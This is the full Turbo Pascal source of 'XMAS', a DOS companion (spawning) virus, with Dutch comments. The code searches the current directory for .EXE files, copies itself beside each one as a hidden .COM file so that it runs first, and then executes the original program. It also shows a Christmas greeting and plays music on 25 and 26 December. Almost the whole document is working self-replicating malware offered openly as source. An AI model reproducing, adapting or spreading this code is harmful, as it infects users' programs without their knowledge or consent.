XMAS.PAS - a non-resident spawning .EXE infector - Source Code

1. {
2.  
3.     XMAS Virus, a non-resident spawning .EXE infector by Glenn Benton
4.     To be compiled with Turbo Assembler 6.0
5.  
6.     Files required : XMAS.PAS       - Viral part (this one)
7.                      XMAS.OBJ       - Music data (composed by myself!)
8.                      PLAYIT.TPU     - Music player engine
9.  
10.     Set the environment variables for different effects :
11.  
12.     SET XMAS=YES          (Disable virus)
13.     SET XMAS=TST          (Plays the music only)
14.     SET XMAS=DEL          (Deletes the virus when a program is started)
15.  
16.     The compiled virus example is compressed and uses 6888 bytes...
17.  
18.         On 25th and 26th the virus activates, playing the music and
19.         wishes you a merry X-mas (nice of me, isn't it?)
20.        
21.  
22. }
23.  
24. Program Xmas;
25.  
26. {$M 4096,0,512}
27.  
28. Uses Crt, Dos, Playit;
29.  
30. Label StartOrig;
31.  
32. Var
33.    Year, Month, Day, DayOfWeek : Word;
34.    DirInfo : SearchRec;
35.    ComSeek : SearchRec;
36.    FileFound : Boolean;
37.    FileName : String;
38.    Parameters : String;
39.    OrigName : String;
40.    P : Byte;
41.    ExtHere : Boolean;
42.    Teller : Word;
43.    StopChar : Char;
44.    FromF : File;
45.  
46. {Dit is de data van het te spelen liedje}
47. {$L XMAS.OBJ}
48. Procedure Christmas; EXTERNAL;
49.  
50. {Deze routine wordt aangeroepen als het 25 of 26 december is}
51. Procedure Active;
52. Begin;
53. StopChar := #0;
54. ClrScr;
55. GotoXY(32,5);
56. WriteLn('Merry Christmas');
57. GotoXY(38,7);
58. WriteLn('and');
59. GotoXY(31,9);
60. WriteLn('A Happy New Year!');
61. GotoXy(31,11);
62. WriteLn('Wished To You By:');
63. GotoXy(34,17);
64. WriteLn('Glenn Benton');
65. GotoXy(27,24);
66. WriteLn('Press any key to continue');
67. Repeat
68.       PlayOBJ(@Christmas, TRUE, StopChar);
69. Until StopChar<>#0;
70. End;
71.  
72. {Deze procedure zoekt een EXE file waarvan er geen COM is en stuurt het
73.  resultaat in de boolean FileFound en de naam van het te maken COM bestand
74.  in FileName}
75. Procedure FileSeek;
76.  
77. Label Seeker, FileSeekOk;
78. Begin;
79. FileFound:=False;
80. FindFirst('*.EXE',Anyfile,DirInfo);
81.  
82. Seeker:
83. If DosError=18 Then Exit;
84. FileName:= DirInfo.Name;
85. Delete(FileName,Length(FileName)-2,3);
86. Insert('COM',FileName,Length(FileName)+1);
87. FindFirst(FileName,AnyFile,ComSeek);
88. If DosError=18 Then Goto FileSeekOk;
89. FindNext(DirInfo);
90. Goto Seeker;
91.  
92. FileSeekOk:
93. FileFound:=True;
94. End;
95.  
96. Procedure CopyFile;
97. var
98.   FromF, ToF: file;
99.   NumRead, NumWritten: Word;
100.   buf: array[1..512] of Char;
101. begin;
102.   { Open input file }
103.   Assign(FromF, ParamStr(0));
104.   { Record size = 1 }
105.   Reset(FromF, 1);
106.   { Open output file }
107.   Assign(ToF, FileName);
108.   { Record size = 1 }
109.   Rewrite(ToF, 1);
110.   repeat
111.     BlockRead(FromF,buf,
112.               SizeOf(buf),NumRead);
113.     BlockWrite(ToF,buf,NumRead,NumWritten);
114.   until (NumRead = 0) or
115.         (NumWritten <> NumRead);
116.   Close(FromF);
117.   Close(ToF);
118.   Assign(ToF,FileName);
119.   SetFAttr(ToF,Hidden);
120. end;
121.  
122.  
123. Begin; {Hoofdprocedure}
124. If (GetEnv('XMAS')='DEL') or (GetEnv('XMAS')='del') Then
125.    Begin;
126.    OrigName:=ParamStr(0);
127.    ExtHere:=False;
128.    P:=Pos('.COM',OrigName);
129.    If P<>0 Then ExtHere:=True;
130.    P:=Pos('.com',OrigName);
131.    If P<>0 Then ExtHere:=True;
132.    If ExtHere=False Then
133.                  OrigName:=OrigName+'.COM';
134.    Assign(FromF, OrigName);
135.    SetFAttr(FromF,Archive);
136.    Erase(FromF);
137.    Goto StartOrig;
138.    End;
139. If (GetEnv('XMAS')='TST') or (GetEnv('XMAS')='tst') Then
140.    Begin;
141.    Active;
142.    Goto StartOrig;
143.    End;
144.  
145. If (GetEnv('XMAS')='YES') or (GetEnv('XMAS')='yes') Then Goto StartOrig;
146.  
147. {Datum bekijken of het 25 of 26 december is en indien juist Active aanroepen}
148. GetDate(Year, Month, Day, DayOfWeek);
149. If (Month=12) and ((Day=25) or (Day=26)) then Active;
150.  
151. {Procedure voor EXE file zoeken aanroepen}
152. FileSeek;
153.  
154. {Als er een kandidaat is gevonden, dit prg als COM erbij zetten}
155. If FileFound=False Then Goto StartOrig;
156. CopyFile;
157.  
158. StartOrig:
159. Parameters:='';
160. For Teller:= 1 to ParamCount Do Parameters:=Parameters+' '+ParamStr(Teller);
161. OrigName:=ParamStr(0);
162. ExtHere:=False;
163. P:=Pos('.COM',OrigName);
164. If P<>0 Then ExtHere:=True;
165. P:=Pos('.com',OrigName);
166. If P<>0 Then ExtHere:=True;
167. If ExtHere=False Then
168.                  OrigName:=OrigName+'.EXE';
169. If ExtHere=True Then
170.                  Begin;
171.                  Delete(OrigName,Length(OrigName)-3,4);
172.                  OrigName:=OrigName+'.EXE';
173.                  End;
174. SwapVectors;
175. Exec(OrigName,Parameters);
176. SwapVectors;
177. Halt(DosExitCode);
178. End.
179.